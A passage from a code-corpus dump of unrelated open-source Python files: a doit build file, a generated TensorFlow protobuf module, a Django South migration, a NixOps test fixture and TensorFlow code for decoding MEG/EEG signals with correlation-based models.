'calc_dep.py', # uses files not created by the script
'report_deps.py', # uses files not created by the script
'doit_config.py', # no tasks defined
]
exclude = set('doc/samples/{}'.format(m) for m in black_list)
arguments = {'doc/samples/pos.py': 'pos_args -p 4 foo bar'}
for sample in glob.glob("doc/samples/*.py"):
if sample in exclude:
continue
args = arguments.get(sample, '')
yield {
'name': sample,
'actions': ['doit -f {} {}'.format(sample, args)],
}
def task_website():
"""dodo file create website html files"""
return {'actions': None,
'task_dep': ['sphinx', 'samples_check'],
}
def task_website_update():
"""update website on SITE_PATH
website is hosted on github-pages
this task just copy the generated content to SITE_PATH,
need to commit/push to deploy site.
"""
SITE_PATH = '../doit-website'
SITE_URL = 'pydoit.org'
return {
'actions': [
"rsync -avP %s %s" % (DOC_BUILD_PATH, SITE_PATH),
"echo %s > %s" % (SITE_URL, os.path.join(SITE_PATH, 'CNAME')),
"touch %s" % os.path.join(SITE_PATH, '.nojekyll'),
],
'task_dep': ['website'],
}
def task_package():
"""create/upload package to pypi"""
pkg = Package()
yield pkg.revision_git()
yield pkg.manifest_git()
yield pkg.sdist()
# yield pkg.sdist_upload()
# doit -f ../doit-recipes/deps/deps.py -d . --reporter=executed-only
| JohannesBuchner/doit | dodo.py | Python | mit | 4,042 |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorflow/core/framework/op_gen_overrides.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from tensorflow.core.framework import attr_value_pb2 as tensorflow_dot_core_dot_framework_dot_attr__value__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow/core/framework/op_gen_overrides.proto',
package='tensorflow',
syntax='proto3',
serialized_pb=_b('\n0tensorflow/core/framework/op_gen_overrides.proto\x12\ntensorflow\x1a*tensorflow/core/framework/attr_value.proto\"\xa7\x03\n\rOpGenOverride\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04skip\x18\x02 \x01(\x08\x12\x0c\n\x04hide\x18\x03 \x01(\x08\x12\x11\n\trename_to\x18\x04 \x01(\t\x12\r\n\x05\x61lias\x18\x05 \x03(\t\x12;\n\x0c\x61ttr_default\x18\x06 \x03(\x0b\x32%.tensorflow.OpGenOverride.AttrDefault\x12\x35\n\x0b\x61ttr_rename\x18\x07 \x03(\x0b\x32 .tensorflow.OpGenOverride.Rename\x12\x36\n\x0cinput_rename\x18\x08 \x03(\x0b\x32 .tensorflow.OpGenOverride.Rename\x12\x37\n\routput_rename\x18\t \x03(\x0b\x32 .tensorflow.OpGenOverride.Rename\x1a\x41\n\x0b\x41ttrDefault\x12\x0c\n\x04name\x18\x01 \x01(\t\x12$\n\x05value\x18\x02 \x01(\x0b\x32\x15.tensorflow.AttrValue\x1a\"\n\x06Rename\x12\x0c\n\x04\x66rom\x18\x01 \x01(\t\x12\n\n\x02to\x18\x02 \x01(\t\"7\n\x0eOpGenOverrides\x12%\n\x02op\x18\x01 \x03(\x0b\x32\x19.tensorflow.OpGenOverrideb\x06proto3')
,
dependencies=[tensorflow_dot_core_dot_framework_dot_attr__value__pb2.DESCRIPTOR,])
_OPGENOVERRIDE_ATTRDEFAULT = _descriptor.Descriptor(
name='AttrDefault',
full_name='tensorflow.OpGenOverride.AttrDefault',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='tensorflow.OpGenOverride.AttrDefault.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='tensorflow.OpGenOverride.AttrDefault.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=431,
serialized_end=496,
)
_OPGENOVERRIDE_RENAME = _descriptor.Descriptor(
name='Rename',
full_name='tensorflow.OpGenOverride.Rename',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='from', full_name='tensorflow.OpGenOverride.Rename.from', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='to', full_name='tensorflow.OpGenOverride.Rename.to', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=498,
serialized_end=532,
)
_OPGENOVERRIDE = _descriptor.Descriptor(
name='OpGenOverride',
full_name='tensorflow.OpGenOverride',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='tensorflow.OpGenOverride.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='skip', full_name='tensorflow.OpGenOverride.skip', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hide', full_name='tensorflow.OpGenOverride.hide', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rename_to', full_name='tensorflow.OpGenOverride.rename_to', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='alias', full_name='tensorflow.OpGenOverride.alias', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attr_default', full_name='tensorflow.OpGenOverride.attr_default', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attr_rename', full_name='tensorflow.OpGenOverride.attr_rename', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='input_rename', full_name='tensorflow.OpGenOverride.input_rename', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='output_rename', full_name='tensorflow.OpGenOverride.output_rename', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_OPGENOVERRIDE_ATTRDEFAULT, _OPGENOVERRIDE_RENAME, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=109,
serialized_end=532,
)
_OPGENOVERRIDES = _descriptor.Descriptor(
name='OpGenOverrides',
full_name='tensorflow.OpGenOverrides',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='op', full_name='tensorflow.OpGenOverrides.op', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=534,
serialized_end=589,
)
_OPGENOVERRIDE_ATTRDEFAULT.fields_by_name['value'].message_type = tensorflow_dot_core_dot_framework_dot_attr__value__pb2._ATTRVALUE
_OPGENOVERRIDE_ATTRDEFAULT.containing_type = _OPGENOVERRIDE
_OPGENOVERRIDE_RENAME.containing_type = _OPGENOVERRIDE
_OPGENOVERRIDE.fields_by_name['attr_default'].message_type = _OPGENOVERRIDE_ATTRDEFAULT
_OPGENOVERRIDE.fields_by_name['attr_rename'].message_type = _OPGENOVERRIDE_RENAME
_OPGENOVERRIDE.fields_by_name['input_rename'].message_type = _OPGENOVERRIDE_RENAME
_OPGENOVERRIDE.fields_by_name['output_rename'].message_type = _OPGENOVERRIDE_RENAME
_OPGENOVERRIDES.fields_by_name['op'].message_type = _OPGENOVERRIDE
DESCRIPTOR.message_types_by_name['OpGenOverride'] = _OPGENOVERRIDE
DESCRIPTOR.message_types_by_name['OpGenOverrides'] = _OPGENOVERRIDES
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
OpGenOverride = _reflection.GeneratedProtocolMessageType('OpGenOverride', (_message.Message,), dict(
AttrDefault = _reflection.GeneratedProtocolMessageType('AttrDefault', (_message.Message,), dict(
DESCRIPTOR = _OPGENOVERRIDE_ATTRDEFAULT,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverride.AttrDefault)
))
,
Rename = _reflection.GeneratedProtocolMessageType('Rename', (_message.Message,), dict(
DESCRIPTOR = _OPGENOVERRIDE_RENAME,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverride.Rename)
))
,
DESCRIPTOR = _OPGENOVERRIDE,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverride)
))
_sym_db.RegisterMessage(OpGenOverride)
_sym_db.RegisterMessage(OpGenOverride.AttrDefault)
_sym_db.RegisterMessage(OpGenOverride.Rename)
OpGenOverrides = _reflection.GeneratedProtocolMessageType('OpGenOverrides', (_message.Message,), dict(
DESCRIPTOR = _OPGENOVERRIDES,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverrides)
))
_sym_db.RegisterMessage(OpGenOverrides)
try:
# THESE ELEMENTS WILL BE DEPRECATED.
# Please use the generated *_pb2_grpc.py files instead.
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
except ImportError:
pass
# @@protoc_insertion_point(module_scope)
| fluxcapacitor/pipeline | libs/pipeline_model/tensorflow/core/framework/op_gen_overrides_pb2.py | Python | apache-2.0 | 10,908 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Ad'
db.create_table(u'polyclassifiedads_ad', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('secret_key', self.gf('django.db.models.fields.CharField')(max_length=128)),
('creation_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('last_modification_date', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('online_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('offline_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('is_validated', self.gf('django.db.models.fields.BooleanField')(default=False)),
('is_deleted', self.gf('django.db.models.fields.BooleanField')(default=False)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('content', self.gf('django.db.models.fields.TextField')()),
('contact_email', self.gf('django.db.models.fields.EmailField')(max_length=75)),
('contact_phone', self.gf('django.db.models.fields.TextField')(max_length=32, null=True, blank=True)),
))
db.send_create_signal(u'polyclassifiedads', ['Ad'])
# Adding M2M table for field tags on 'Ad'
m2m_table_name = db.shorten_name(u'polyclassifiedads_ad_tags')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('ad', models.ForeignKey(orm[u'polyclassifiedads.ad'], null=False)),
('adtag', models.ForeignKey(orm[u'polyclassifiedads.adtag'], null=False))
))
db.create_unique(m2m_table_name, ['ad_id', 'adtag_id'])
# Adding model 'AdTag'
db.create_table(u'polyclassifiedads_adtag', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('tag', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal(u'polyclassifiedads', ['AdTag'])
def backwards(self, orm):
# Deleting model 'Ad'
db.delete_table(u'polyclassifiedads_ad')
# Removing M2M table for field tags on 'Ad'
db.delete_table(db.shorten_name(u'polyclassifiedads_ad_tags'))
# Deleting model 'AdTag'
db.delete_table(u'polyclassifiedads_adtag')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'polyclassifiedads.ad': {
'Meta': {'object_name': 'Ad'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'contact_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'contact_phone': ('django.db.models.fields.TextField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_validated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_modification_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'offline_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'online_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'ads'", 'symmetrical': 'False', 'to': u"orm['polyclassifiedads.AdTag']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'polyclassifiedads.adtag': {
'Meta': {'object_name': 'AdTag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['polyclassifiedads']
| PolyLAN/polyclassifiedads | polyclassifiedads/migrations/0001_initial.py | Python | bsd-2-clause | 7,916 |
import os
import subprocess
import nixops.statefile
from nose import SkipTest
from tests.functional import DatabaseUsingTest
class GenericDeploymentTest(DatabaseUsingTest):
def setup(self):
super(GenericDeploymentTest, self).setup()
self.depl = self.sf.create_deployment()
self.depl.logger.set_autoresponse("y")
| NixOS/nixops | tests/functional/generic_deployment_test.py | Python | lgpl-3.0 | 344 |
# Copyright 2019-2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TF code to decode an MEG/EEG signal.
TF models and code to predict MEG/EEG signals from their input audio features,
or vice versa.
"""
import datetime
import json
import os
from absl import logging
import numpy as np
import tensorflow.compat.v2 as tf
# User should call tf.compat.v1.enable_v2_behavior()
def pearson_correlation(x, y):
"""Compute the Pearson correlation coefficient between two tensors of data.
This routine computes a vector correlation using Tensorflow ops.
Calculation from:
https://en.wikipedia.org/wiki/Pearson_correlation_coefficient
Args:
x: one of two input arrays.
y: second of two input arrays.
Returns:
Tensor vector of correlation coefficients, one correlation per column of
data.
Note: When used as a Keras metric, the mean of this multidimensional output
  is used, which is problematic since most of the lower dimensions are close
to zero, and the mean heads towards zero. The _first and _second routines are
probably a better choice.
Note #2: Do not use this directly to evaluate the output of a CCA model. That
  model concatenates both outputs into the y array, so you need to compute the
error *within* just y.
"""
# TODO should this be a tf.function?
assert x.shape[-1] == y.shape[-1], ('x (%s) and y (%s) do not have the same '
'final dimensionality' % (x.shape,
y.shape))
x_m = x - tf.math.reduce_mean(x, axis=0)
y_m = y - tf.math.reduce_mean(y, axis=0)
x_p = tf.math.reduce_sum(tf.math.square(x_m), axis=0)
y_p = tf.math.reduce_sum(tf.math.square(y_m), axis=0)
def positive_fcn():
res = tf.divide(tf.math.reduce_sum(tf.multiply(x_m, y_m), axis=0),
tf.multiply(tf.math.sqrt(x_p), tf.math.sqrt(y_p)))
return res
def negative_fcn():
return 0*x_m # Just to get the right size
zero_cond = tf.math.logical_or(tf.math.reduce_prod(x_p) <= 0,
tf.math.reduce_prod(y_p) <= 0)
return tf.cond(zero_cond,
negative_fcn, positive_fcn)
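# Minimal usage sketch (illustrative shapes and values, not part of the
# original module):
#   x = tf.random.normal((100, 4))
#   y = x + 0.1 * tf.random.normal((100, 4))
#   r = pearson_correlation(x, y)  # shape (4,): one coefficient per column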
def pearson_correlation_first(x, y):
"""Return the correlation of the first CCA dimension."""
result = pearson_correlation(x, y)
return result[0]
def pearson_correlation_second(x, y):
"""Return the correlation of the second CCA dimension."""
result = pearson_correlation(x, y)
return result[1]
class PearsonCorrelationLoss(tf.keras.losses.Loss):
"""Implements the Pearson correlation calculation as a Keras loss.
  Note: since this is a Keras loss, this function returns the instantaneous
correlation for each data point. Sum all of these values to get the full
batch correlation.
Testing: Not sure if this will train a network to converge.
"""
def call(self, x, y):
"""The actual correlation calculation. See class notes above.
Args:
x: first data array of size num_frames x num_features.
y: second data array of the same size as x
Returns:
A vector with num_frame individual *negative* correlations. The negative
of the correlations are returned so that this can be used as a loss.
"""
if x.shape != y.shape:
      raise ValueError('Two correlation arrays must have the same size, not '
                       '%s vs %s.' % (x.shape, y.shape))
x_m = x - tf.math.reduce_mean(x, axis=0)
y_m = y - tf.math.reduce_mean(y, axis=0)
x_std = tf.math.reduce_sum(tf.math.square(x_m), axis=0)
y_std = tf.math.reduce_sum(tf.math.square(y_m), axis=0)
power = tf.sqrt(tf.multiply(x_std, y_std))
return -tf.math.reduce_sum(tf.divide(tf.multiply(x_m, y_m), power),
axis=-1)
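# Usage sketch (assumption: any compiled Keras model; names are illustrative):
#   model.compile(optimizer='adam', loss=PearsonCorrelationLoss())
# Summing the per-sample values returned by call() gives the negative of the
# full-batch correlation described in the class docstring.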
class BrainModel(tf.keras.models.Model):
"""Light wrapper around Keras Model with better error checking.
This class defines several different kinds of networks (e.g. linear, CCA, and
DNN). This allows us to specialize the training process (in the case of CCA
and linear, which have deterministic algorithms.)
In addition this class makes three additions to the standard Keras Model
class.
1) The class __init__ method takes a tensorboard_dir argument, which is then
automatically added as a callback to the fit and evaluate methods.
2) The fit and evaluate methods both do additional type checking, to make
sure the dataset are compatible with the call() method, before calling the
system routines.
3) The evaluate function returns a dictionary of results (instead of a bare
list)
"""
def __init__(self, tensorboard_dir=None, **kwargs):
"""Create a BrainModel object.
Note, this class essentially serves as a shim, adding a couple of features
to the standard API. See above.
Args:
tensorboard_dir: location to dump tensorboard logs. Added to evaluate
and fit methods.
**kwargs: Any arguments supported or needed by tf.keras.models.Model
"""
if tensorboard_dir:
self._tensorboard_dir = os.path.join(
tensorboard_dir, datetime.datetime.now().strftime('%Y%m%d-%H%M%S'))
logging.info('Writing tensorboard data to %s', self._tensorboard_dir)
else:
self._tensorboard_dir = None
super(BrainModel, self).__init__(**kwargs)
@property
def tensorboard_dir(self):
return self._tensorboard_dir
def fit(self, x=None, y=None, **kwargs):
"""Train the generic model. Add the tensorboard callback if requested.
Args:
x: Data to use for training model
y: Needed for compatibility with the super class, but should always be
None, since the dataset supplies inputs and outputs.
**kwargs: Extra arguments to pass to the main fit method
Returns:
A dictionary of training statistics, created by zipping the original
results and the metric names into a single dictionary.
"""
    if not isinstance(x, tf.data.Dataset) and 'input_1' not in x:
      raise TypeError('BrainModel.fit must be called with a tf.data.Dataset '
                      'object (or a dict containing input_1), not %s' %
                      type(x))
if y is not None:
raise ValueError('Y value not needed, should be part of dataset.')
if self._tensorboard_dir:
if 'callbacks' in kwargs:
kwargs['callbacks'].append(
tf.keras.callbacks.TensorBoard(log_dir=self._tensorboard_dir))
else:
kwargs['callbacks'] = [
tf.keras.callbacks.TensorBoard(log_dir=self._tensorboard_dir),]
history = super(BrainModel, self).fit(x, **kwargs)
logging.info('Training a %s model returned these metrics: %s',
self, history)
return history
def evaluate(self, x=None, y=None, epoch_count=1, **kwargs):
"""Evaluate a model using a sample dataset.
    The dataset should provide a tuple of just the input and output tensors
    (no dictionary).
This method is a shim, automatically adding the tensorboard callback and
reformatting the results into a dictionary (instead of an unlabeled list
of losses.)
Args:
x: data to use for evaluation (a tf.data.Dataset)
y: An empty argument, to retain compatibility with the superclass
epoch_count: How many epochs have we trained on so far, for reporting.
**kwargs: Extra arguments to pass to the super class.
Returns:
A dictionary of results.
"""
logging.info('Evaluating with the %s dataset.', x)
if not isinstance(x, tf.data.Dataset):
raise TypeError('BrainModel.evaluate must be called with tf.data.Dataset'
' object.')
if self._tensorboard_dir:
if 'callbacks' in kwargs:
kwargs['callbacks'].append(
tf.keras.callbacks.TensorBoard(
log_dir=self._tensorboard_dir+'/test'))
else:
kwargs['callbacks'] = [tf.keras.callbacks.TensorBoard(
log_dir=self._tensorboard_dir+'/test'),]
results = super(BrainModel, self).evaluate(x, **kwargs)
logging.info('Evaluate names are: %s', self.metrics_names)
logging.info('Evaluate results are: %s', results)
if not isinstance(results, list):
results = [results,]
metrics = dict(zip(self.metrics_names, results))
if self._tensorboard_dir:
# Add our own summary statistics so we can see them in Tensorboard.
logdir = os.path.join(self._tensorboard_dir, 'results')
writer = tf.summary.create_file_writer(logdir=logdir)
with writer.as_default():
for name, val in metrics.items():
tf.summary.scalar(name, val, step=epoch_count)
return metrics
def add_metadata(self, flags, dataset=None):
"""Add data to the model so it will be saved with the model.
Data can be in any format, but it probably makes the most sense for it to
be a dictionary.
Args:
flags: parameters to add, probably a dictionary of flag values.
dataset: Optional dataset from which to infer the input & output sizes
"""
# Must use variable here, not constant, in order for the value to be
# saved in the model.
self.telluride_metadata = tf.Variable(json.dumps(flags))
if not dataset:
return
if not isinstance(dataset, tf.data.Dataset):
raise TypeError('dataset parameter must be tf.data.Dataset type.')
for data in dataset.take(1):
inputs, output = data
for k in inputs:
inputs[k] = list(inputs[k].shape)
output = list(output.shape)
self.telluride_inputs = tf.Variable(json.dumps(inputs))
self.telluride_output = tf.Variable(json.dumps(output))
def add_tensorboard_summary(self, name, data, subdir='train', step=0):
"""Adds a scalar event to the tensorboard data.
Args:
name: Name of the variable or event, a string.
data: A scalar value associated with the variable.
subdir: A string indicating the sub directory to store the event.
step: Which time step to associate with the result.
"""
if not isinstance(name, str):
raise TypeError('Tensorboard name must be a string, not a %s.' %
type(name))
if not isinstance(subdir, str):
raise TypeError('Tensorboard subdir must be a string, not a %s.' %
type(subdir))
if self._tensorboard_dir:
logdir = os.path.join(self._tensorboard_dir, subdir)
writer = tf.summary.create_file_writer(logdir=logdir)
with writer.as_default():
tf.summary.text(name, str(data), step=step)
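# A hedged sketch (not part of the original module) of reading back the
# metadata stored by BrainModel.add_metadata() above. The telluride_*
# attributes are tf.Variables holding JSON strings, so they survive a
# save/load round trip and can be decoded like this:
def _read_model_metadata(model):
  """Decode the JSON metadata attached to a BrainModel, if present."""
  metadata = {}
  for attr in ('telluride_metadata', 'telluride_inputs', 'telluride_output'):
    if hasattr(model, attr):
      metadata[attr] = json.loads(getattr(model, attr).numpy())
  return metadata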
######################### Create Linear Regressor ###########################
class BrainModelLinearRegression(BrainModel):
"""A linear regression class, computed deterministically from the input data.
Implemented as a single dense layer. Use regularization when computing the
optimum weights.
"""
def __init__(self, input_dataset, regularization_lambda=0.0,
tensorboard_dir=None, **kwargs):
"""Create a LinearRegression model.
Args:
input_dataset: data used to figure out the network sizes
regularization_lambda: amount of regularization to perform when computing
the best model.
tensorboard_dir: Where to store data for Tensorboard
      **kwargs: Arguments that are ignored and simply passed to the super class.
"""
super(BrainModelLinearRegression, self).__init__(
tensorboard_dir=tensorboard_dir, **kwargs)
if not isinstance(input_dataset, tf.data.Dataset):
      raise ValueError('Dataset must be a tf.data.Dataset, not a %s' %
                       type(input_dataset))
self._input_width = input_dataset.element_spec[0]['input_1'].shape[-1]
self._output_width = input_dataset.element_spec[1].shape[-1]
self._regularization_lambda = regularization_lambda
self._input_1 = tf.keras.Input(shape=self._input_width,
name='input_1')
self._layer = tf.keras.layers.Dense(self._output_width, activation=None,
use_bias=True, trainable=True,
kernel_initializer=None,
bias_initializer=None)
def call(self, input_dataset):
return self._layer(input_dataset['input_1'])
def compile(self, optimizer=tf.keras.optimizers.RMSprop,
loss='mse',
metrics=pearson_correlation_first,
learning_rate=1e-3, **kwargs):
"""Compile this model, applying the usual defaults for this classifier.
Args:
optimizer: Which Keras optimizer to use when training.
loss: How do we normally define the performance (loss) of the network.
metrics: Which metric(s) do we report after training.
learning_rate: A learning rate to pass to the optimizer
**kwargs: Arguments that are simply passed to the super class' compile().
"""
if callable(optimizer):
optimizer = optimizer(learning_rate=learning_rate)
super(BrainModelLinearRegression, self).compile(
optimizer=optimizer, loss=loss, metrics=metrics, **kwargs)
def fit(self, input_dataset, **kwargs):
"""Do our own training since optimal parameters can be calculated."""
del kwargs # Not needed here since we only need to read the data once.
if not isinstance(input_dataset, tf.data.Dataset):
raise TypeError('BrainModelLinearRegression.train must be called with '
'tf.data.Dataset, not %s.' % type(input_dataset))
(self.w_estimate, self.b_estimate, _, _,
_) = calculate_linear_regressor_parameters_from_dataset(
input_dataset, lamb=self._regularization_lambda)
self.b_estimate = np.reshape(self.b_estimate, (-1,))
    # Need to call the function once (on a single batch) to build the network.
    for input_data, _ in input_dataset.take(1):
      self.call(input_data)
self._layer.set_weights([self.w_estimate, self.b_estimate])
return {} # No training history
@property
def weight_matrices(self):
return self._layer.get_weights()
def calculate_linear_regressor_parameters_from_dataset(dataset, lamb=0.1,
use_offset=True,
use_ridge=True):
"""Estimate the parameters for a linear regressor from a dataset.
Finds A to solve the equation:
Ax = y
This routine reads the dataset, calculating the necessary covariances, and
then returns the solution A to the equation above. Use these values to preload
a linear regressor estimator.
Regression calculation defined here:
https://stackoverflow.com/questions/45959112/get-coefficients-of-a-linear-regression-in-tensorflow
